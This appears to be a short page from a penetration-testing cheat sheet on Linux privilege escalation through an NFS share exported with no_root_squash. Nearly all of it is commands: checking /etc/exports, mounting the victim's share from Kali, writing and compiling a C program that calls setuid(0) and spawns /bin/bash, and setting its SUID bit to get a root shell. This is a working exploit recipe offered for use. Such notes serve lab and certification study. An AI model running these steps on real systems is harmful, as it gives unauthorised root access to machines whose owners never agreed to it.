NFS Root Squashing

Very unlikely vector

cat /etc/exports 
# Check if rw and "no_root_squash" both are present 
# The directory in which both are present is shareable and mountable.

# On kali
showmount -e <Victim IP>
mkdir /tmp/1
mount -o rw,vers=2 <Victim IP>:/tmp /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/x.c
gcc /tmp/1/x.c -o /tmp/1/x
chmod +s /tmp/1/x

PreviousCapabilities NextWindows PrivEsc

Last updated 1 year ago